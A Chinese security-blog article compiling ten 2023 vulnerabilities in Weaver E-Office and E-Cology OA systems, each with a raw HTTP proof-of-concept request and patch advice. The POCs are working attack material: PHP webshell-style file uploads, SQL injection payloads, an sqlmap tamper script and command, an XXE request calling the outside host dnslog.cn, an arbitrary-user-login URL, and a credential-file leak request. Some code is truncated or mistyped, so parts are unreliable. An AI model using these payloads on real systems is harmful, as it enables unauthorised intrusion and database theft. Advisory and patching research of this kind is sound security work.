最近整理了2023年泛微OA存在的相关漏洞(附POC)
-
泛微 E-Office文件上传漏洞(CVE-2023-2523)1
-
泛微 E-Office文件上传漏洞(CVE-2023-2648)2
-
泛微E-Cology SQL注入漏洞(CVE-2023-15672)3
-
泛微E-Cology XXE漏洞(QVD-2023-16177)4
-
泛微OA E-Cology9未授权SQL注入漏洞(CNVD-2023-12632)5
-
泛微OA e-cology前台接口SQL注入漏洞7
-
泛微 e-cology ofsLogin任意用户登录漏洞8
-
泛微E-Cology /CheckServer.jsp 路径SQL注入漏洞(QVD-2023-9849)9
-
泛微E-Office UserSelect未授权访问漏洞10
-
泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞
10
1.泛微 E-Office文件上传漏洞(CVE-2023-2523)
泛微e-office 9.5版本,源文件 App/Ajax/ajax.php?action=mobile_upload_save 的一些未知功能存在问题。参数 upload_quwan 的操作导致不受限制的上传,未经身份验证的恶意攻击者通过上传恶意文件,从而获取目标服务器的控制权限。
漏洞编号:CVE-2023-2523
漏洞类型:任意文件上传
影响版本:泛微e-office 9.5版本
POC:
POST/Emobile/App/Ajax/ajax.php?action=mobile_upload_save HTTP/1.1Host:your-ipCache-Control:max-age=0Upgrade-Insecure-Requests:1Origin:nullContent-Type:multipart/form-data; boundary=----WebKitFormBoundarydRVCGWq4Cx3Sq6ttAccept-Encoding:gzip, deflateAccept-Language:en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7Connection:close------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition:form-data; name="upload_quwan"; filename="1.php."Content-Type:image/jpeg<?phpphpinfo();?>------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition:form-data; name="file"; filename=""Content-Type:application/octet-stream------WebKitFormBoundarydRVCGWq4Cx3Sq6tt--
修复建议:
目前官方已修复以上漏洞,建议升级更新到安全版本。
2.泛微 E-Office文件上传漏洞(CVE-2023-2648)
泛微e-office 9.5版本源文件/inc/jquery/uploadify/uploadify.php存在问题,对参数Filedata的操作会导致不受限制的上传,未经身份验证的恶意攻击者通过上传恶意文件,从而获取目标服务器的控制权限。
漏洞编号:CVE-2023-2648
漏洞类型:任意文件上传
影响版本:泛微e-office 9.5版本
POC:
POST /inc/jquery/uploadify/uploadify.php HTTP/1.1Host:***Cache-Control: max-age=0Upgrade-Insecure-Requests: 1Origin: nullContent-Type: multipart/form-data; boundary=-WebKitFormBoundarydRVCGWq4Cx3Sq6ttAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7Connection: close------WebKitFormBoundarydRVCGWq4Cx3Sq6ttContent-Disposition: form-data; name="Fdiledata"; filename="uploadify.php."Content-Type: image/jpeg<?php phpinfo();?>------WebKitFormBoundarydRVCGWq4Cx3Sq6tt
修复建议:
目前官方已修复以上漏洞,建议升级更新到安全版本。
3.泛微E-Cology SQL注入漏洞(CVE-2023-15672)
泛微e-cology未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限等。
漏洞编号:CVE-2023-15672
漏洞类型:SQL注入
影响版本:Ecology 9.x 补丁版本 < 10.58.0;Ecology 8.x 补丁版本 < 10.58.0
POC:
GET /weaver/weaver.file.FileDownloadForOutDoc/?fileid=123+WAITFOR+DELAY+'0:0:5'&isFromOutImg=1 HTTP/1.1Host:***Accept:*/*Connection: close
sqlmap利用:
请求遍历随机数去配合payload实现注入的tamper脚本
import os,re,randomfrom lib.core.enums import PRIORITYfrom lib.core.common import singleTimeWarnMessagefrom lib.core.enums import DBMSpriority = PRIORITY.HIGHESTdef tamper(payload, **kwargs):result = ""num = random.randint(1,2**27)result = str(num)+payloadreturn resul
尝试注入:
python3 sqlmap.py -r post.txt --tamper=ecology_sql_random.py --batch --dbs修复建议:
目前官方已发布安全补丁,建议受影响用户尽快升级至10.58及以上版本。
4.泛微E-Cology XXE漏洞(QVD-2023-16177)
泛微e-cology某处功能点最初针对用户输入的过滤不太完善,导致在处理用户输入时可触发XXE。攻击者可利用该漏洞列目录、读取文件,甚至可能获取应用系统的管理员权限。
漏洞编号:QVD-2023-16177
漏洞类型:XXE
影响版本:泛微 EC 9.x 且补丁版本 < 10.58.2;泛微 EC 8.x 且补丁版本 < 10.58.2
POC:
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1Host:***Content-Type: application/xml<M><syscode>&send;</syscode></M>
EXP1:
POST /rest/ofs/ReceiveCCRequestByXml HTTP/1.1Host:****Content-Type: application/xml
EXP2:
POST /rest/ofs/deleteUserRequestInfoByXml HTTP/1.1Host:***Content-Type: application/xml<?xml version="1.0" encoding="utf-8"?><!DOCTYPE syscode SYSTEM "http://dnslog.cn"><M><syscode>&send;</syscode></M>
修复建议:
1.限制访问来源地址,如非必要,不要将系统开放在互联网上。
2.目前官方已发布10.58.2来修复此漏洞,建议受影响用户更新至10.58.2
https://www.weaver.com.cn/cs/securityDownload.html#5.泛微OA E-Cology9未授权SQL注入漏洞(CNVD-2023-12632)
泛微新一代移动办公平台e-cology不仅组织提供了一体化的协同工作平台,将组织事务逐渐实现全程电子化,改变传统纸质文件、实体签章的方式。泛微OA E-Cology 平台browser.jsp处存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。
漏洞编号:CNVD-2023-12632
漏洞类型:SQL注入
影响版本:泛微e-cology V9 < 10.56
POC:
POST /mobile/plugin/browser.jsp HTTP/1.1Host:***Upgrade-Insecure-Requests: 1Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9x-forwarded-for:***x-originating-ip:***x-remote-ip: ***x-remote-addr:***Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 649isDis=1&browserTypeId=269&keyword=%2525%2536%2531%2525%2532%2537%2525%2532%2530%2525%2537%2535%2525%2536%2565%2525%2536%2539%2525%2536%2566%2525%2536%2565%2525%2532%2530%2525%2537%2533%2525%2536%2535%2525%2536%2563%2525%2536%2535%2525%2536%2533%2525%2537%2534%2525%2532%2530%2525%2533%2531%2525%2532%2563%2525%2532%2537%2525%2532%2537%2525%2532%2562%2525%2532%2538%2525%2535%2533%2525%2534%2535%2525%2534%2563%2525%2534%2535%2525%2534%2533%2525%2535%2534%2525%2532%2530%2525%2534%2530%2525%2534%2530%2525%2535%2536%2525%2534%2535%2525%2535%2532%2525%2535%2533%2525%2534%2539%2525%2534%2566%2525%2534%2565%2525%2532%2539%2525%2532%2562%2525%2532%2537
修复建议:
升级至安全版本,官方修复方案
https://www.weaver.com.cn/cs/securityDownload.asp#6.泛微OA e-cology前台接口SQL注入漏洞
由于OA系统的WorkflowCenterTreeData接口在收到用户输入的时候未进行安全过滤,oracle数据库传入恶意SQL语句,导致SQL漏洞。
漏洞编号:无
漏洞类型:SQL注入
影响版本:使用oracle数据库的泛微 e-cology OA 系统
POC:
POST /mobile/browser/WorkflowCenterTreeData.jsp?node=wftype_1&scope=2333 HTTP/1.1Host:***Content-Type: application/x-www-form-urlencodedConnection: closeUpgrade-Insecure-Requests: 1formids=11111111111)))%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0d%0a%0dunion select NULL,value from v$parameter order by (((1
修复建议:官网已更新补丁
7.泛微 e-cology ofsLogin任意用户登录漏洞
泛微e-cology是一套兼具企业信息门户、知识文档管理、工作流程管理、人力资源管理、客户关系管理、项目管理、财务管理、资产管理、供应链管理、数据中心功能的企业大型协同管理平台。泛微e-cology前台任意用户登录漏洞:泛微e-cology9部分版本中存在前台任意用户登录漏洞。该漏洞允许未经身份验证的攻击者通过发送构造的请求触发漏洞,成功利用此漏洞的攻击者可登录任意用户。
漏洞编号:无
漏洞类型:认证绕过
影响版本:部分 e-cology9 并且补丁版本 < 10.57
POC:
/mobile/plugin/1/ofsLogin.jsp?gopage=/wui/index.html&loginTokenFromThird=866fb3887a60239fc112354ee7ffc168&receiver=1&syscode=1×tamp修复建议:
目前,官方已发布修复建议,建议受影响的用户尽快升级至最新版本的补丁。
https://www.weaver.com.cn/cs/securityDownload.asp#8.泛微E-Cology /CheckServer.jsp 路径SQL注入漏洞(QVD-2023-9849)
泛微 Ecology OA 系统对用户传入的数据过滤处理不当,导致存在 SQL 注入漏洞,未经过身份认证的远程攻击者可利用此漏洞执行任意SQL指令,从而窃取数据库敏感信息。
漏洞编号:QVD-2023-9849
漏洞类型:SQL注入
影响版本:泛微 Ecology 9.x <= v10.56;泛微 Ecology 8.x <= v10.56
POC:
GET /mobile/plugin/CheckServer.jsp?type=mobileSetting HTTP/1.1Host: ***Connection: close
访问/mobile/plugin/CheckServer.jsp?type=mobileSetting ,返回状态码200且参数值为{“error”;”system error”}
修复建议:
目前官方已发布安全补丁,建议受影响用户尽快升级至10.57及以上版本。
https://www.weaver.com.cn/cs/securityDownload.asp#9.泛微E-Office UserSelect未授权访问漏洞
Weaver E-Office是中国泛微科技(Weaver)公司的一个协同办公系统。泛微OA E-Office UserSelect接口存在未授权访问漏洞,通过漏洞攻击者可以获取敏感信息。
漏洞编号:无
漏洞类型:未授权访问
影响版本:泛微OA E-Office
POC:
GET /UserSelect/ HTTP/1.1Content-Type: application/josn
修复建议:
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://service.e-office.cn/download10.泛微OA E-Office mysql_config.ini 数据库信息泄漏漏洞
泛微 E-Office mysql_config.ini文件可直接访问,泄漏数据库账号密码等信息。
漏洞编号:无
漏洞类型:信息泄露
影响版本:泛微OA E-Office
POC:
GET /mysql_config.ini HTTP/1.1Content-Type: application/josn
修复建议:
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://service.e-office.cn/download
本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。公众号内容中部分攻防技巧等只允许在目标授权的情况下进行使用,大部分文章来自各大安全社区,个人博客,如有侵权请立即联系公众号进行删除。若不同意以上警告信息请立即退出浏览!!!
敲敲小黑板:《刑法》第二百八十五条 【非法侵入计算机信息系统罪;非法获取计算机信息系统数据、非法控制计算机信息系统罪】违反国家规定,侵入国家事务、国防建设、尖端科学技术领域的计算机信息系统的,处三年以下有期徒刑或者拘役。违反国家规定,侵入前款规定以外的计算机信息系统或者采用其他技术手段,获取该计算机信息系统中存储、处理或者传输的数据,或者对该计算机信息系统实施非法控制,情节严重的,处三年以下有期徒刑或者拘役,并处或者单处罚金;情节特别严重的,处三年以上七年以下有期徒刑,并处罚金。
原文始发于微信公众号(巢安实验室):2023泛微OA 漏洞合集(附POC)
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论